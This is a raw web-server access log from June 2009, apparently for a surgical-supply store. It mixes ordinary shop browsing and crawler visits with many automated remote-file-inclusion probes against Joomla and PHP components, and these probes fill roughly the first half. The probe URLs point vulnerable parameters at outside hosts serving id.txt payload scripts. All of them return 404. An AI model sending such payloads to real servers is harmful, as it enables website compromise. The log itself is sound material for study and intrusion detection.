83.98.209.71 - - [28/Jun/2009:01:54:10 -0400] "GET /logs/access_log.Q109060300/components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id2.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
209.59.12.99 - - [28/Jun/2009:01:54:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.98.209.71 - - [28/Jun/2009:01:54:12 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id2.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
131.203.76.246 - - [28/Jun/2009:01:54:42 -0400] "GET /logs/access_log.Q109053100/index.php?option=com_restaurante&task=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
201.232.54.48 - - [28/Jun/2009:01:54:42 -0400] "GET /logs/access_log.Q109053100/index.php?option=com_restaurante&task=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
201.232.54.48 - - [28/Jun/2009:01:54:43 -0400] "GET /logs/index.php?option=com_restaurante&task=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
201.232.54.48 - - [28/Jun/2009:01:54:43 -0400] "GET /index.php?option=com_restaurante&task=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
201.232.54.48 - - [28/Jun/2009:01:54:43 -0400] "GET /logs/access_log.Q109061400/index.php?option=com_restaurante&task=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
201.232.54.48 - - [28/Jun/2009:01:55:13 -0400] "GET /logs/access_log.Q109053100/index.php?option=com_restaurante&task=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
201.232.54.48 - - [28/Jun/2009:01:55:13 -0400] "GET /index.php?option=com_restaurante&task=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
201.232.54.48 - - [28/Jun/2009:01:55:13 -0400] "GET /logs/index.php?option=com_restaurante&task=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
201.232.54.48 - - [28/Jun/2009:01:55:14 -0400] "GET /logs/access_log.Q109061400/index.php?option=com_restaurante&task=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
195.34.78.110 - - [28/Jun/2009:01:55:32 -0400] "GET /logs/access_log.Q109060200//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:01:55:36 -0400] "GET /logs/error_log.Q109060200//modules/vwar/admin/admin.php?vwar_root=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
201.232.54.48 - - [28/Jun/2009:01:56:14 -0400] "GET /logs/access_log.Q109053100/index.php?option=com_restaurante&task=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
201.232.54.48 - - [28/Jun/2009:01:56:14 -0400] "GET /index.php?option=com_restaurante&task=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
201.232.54.48 - - [28/Jun/2009:01:56:14 -0400] "GET /logs/index.php?option=com_restaurante&task=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
210.115.58.73 - - [28/Jun/2009:01:56:21 -0400] "GET /logs/error_log.Q109052300/components/com_performs/performs.php?mosConfig_absolute_path=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
66.249.71.204 - - [28/Jun/2009:01:56:58 -0400] "GET /logs/error_log.Q107112700 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.98.209.71 - - [28/Jun/2009:01:58:05 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://aboutav.com//id2.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.98.209.71 - - [28/Jun/2009:01:58:05 -0400] "GET /errors.php?error=http://aboutav.com//id2.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.98.209.71 - - [28/Jun/2009:01:58:05 -0400] "GET /logs/errors.php?error=http://aboutav.com//id2.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.98.209.71 - - [28/Jun/2009:01:58:39 -0400] "GET /logs/access_log.Q109061300/components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id2.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
83.98.209.71 - - [28/Jun/2009:01:58:43 -0400] "GET /logs/error_log.Q109060100/components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id2.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
209.59.12.99 - - [28/Jun/2009:01:59:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.54.72.148 - - [28/Jun/2009:01:59:32 -0400] "GET /logs/access_log.Q109060800/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://society.maryknoll.org/modules/MKGive/pnimages/projects/id1.txt???? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
200.54.72.148 - - [28/Jun/2009:01:59:32 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://society.maryknoll.org/modules/MKGive/pnimages/projects/id1.txt???? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
83.98.209.71 - - [28/Jun/2009:01:59:43 -0400] "GET /logs/access_log.Q109061300/errors.php?error=http://aboutav.com//id2.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
210.115.58.73 - - [28/Jun/2009:02:01:08 -0400] "GET /logs/access_log.Q109052800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
83.98.209.71 - - [28/Jun/2009:02:01:46 -0400] "GET /logs/errors.php?error=http://aboutav.com//id2.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
83.98.209.71 - - [28/Jun/2009:02:01:46 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://aboutav.com//id2.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
83.98.209.71 - - [28/Jun/2009:02:01:46 -0400] "GET /errors.php?error=http://aboutav.com//id2.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
72.30.142.179 - - [28/Jun/2009:02:02:39 -0400] "GET /logs/error_log.Q108122600 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
83.98.209.71 - - [28/Jun/2009:02:03:01 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aboutav.com//id2.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.98.209.71 - - [28/Jun/2009:02:03:01 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aboutav.com//id2.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.98.209.71 - - [28/Jun/2009:02:03:01 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aboutav.com//id2.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.98.209.71 - - [28/Jun/2009:02:03:02 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aboutav.com//id2.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
83.98.209.71 - - [28/Jun/2009:02:03:02 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aboutav.com//id2.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
83.98.209.71 - - [28/Jun/2009:02:03:02 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aboutav.com//id2.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
83.98.209.71 - - [28/Jun/2009:02:03:20 -0400] "GET /logs/access_log.Q109052800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aboutav.com//id2.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
210.115.58.73 - - [28/Jun/2009:02:03:23 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
210.115.58.73 - - [28/Jun/2009:02:03:23 -0400] "GET /errors.php?error=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
210.115.58.73 - - [28/Jun/2009:02:03:23 -0400] "GET /logs/errors.php?error=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
83.98.209.71 - - [28/Jun/2009:02:03:24 -0400] "GET /logs/access_log.Q109052800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aboutav.com//id2.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.98.209.71 - - [28/Jun/2009:02:03:28 -0400] "GET /logs/access_log.Q109061300/errors.php?error=http://aboutav.com//id2.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
210.115.58.73 - - [28/Jun/2009:02:03:34 -0400] "GET /logs/access_log.Q109061300/errors.php?error=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
209.59.12.99 - - [28/Jun/2009:02:04:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.142.179 - - [28/Jun/2009:02:05:48 -0400] "GET /logs/access_log.Q107090700 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.8.115.172 - - [28/Jun/2009:02:06:29 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 109645 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Dealio Toolbar 3.4; .NET CLR 2.0.50727)"
83.98.209.71 - - [28/Jun/2009:02:07:08 -0400] "GET /logs/access_log.Q109051600/errors.php?error=http://aboutav.com//id2.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
125.237.142.167 - - [28/Jun/2009:02:08:49 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:08:49 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
66.249.71.204 - - [28/Jun/2009:02:08:59 -0400] "GET /logs/error_log.Q107071700 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Jun/2009:02:09:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.237.142.167 - - [28/Jun/2009:02:09:48 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:09:49 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr HTTP/1.1" 200 38023 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:09:52 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:09:52 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:09:52 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:09:52 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:09:52 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:09:52 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:09:53 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:09:53 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:09:53 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:09:53 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:09:55 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:09:55 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:09:55 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:09:55 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:09:55 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:09:56 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:09:56 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:09:56 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:09:56 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:09:56 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:09:56 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:09:56 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:09:56 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:09:56 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:09:56 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:09:59 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:10:04 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2125DD454B4343006E30061+M37+ENG HTTP/1.1" 200 76268 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20burr" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:10:05 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2125DD454B4343006E30061+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:10:05 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2125DD454B4343006E30061+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:10:05 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2125DD454B4343006E30061+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
125.237.142.167 - - [28/Jun/2009:02:10:12 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2125DD454B4343006E30061+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
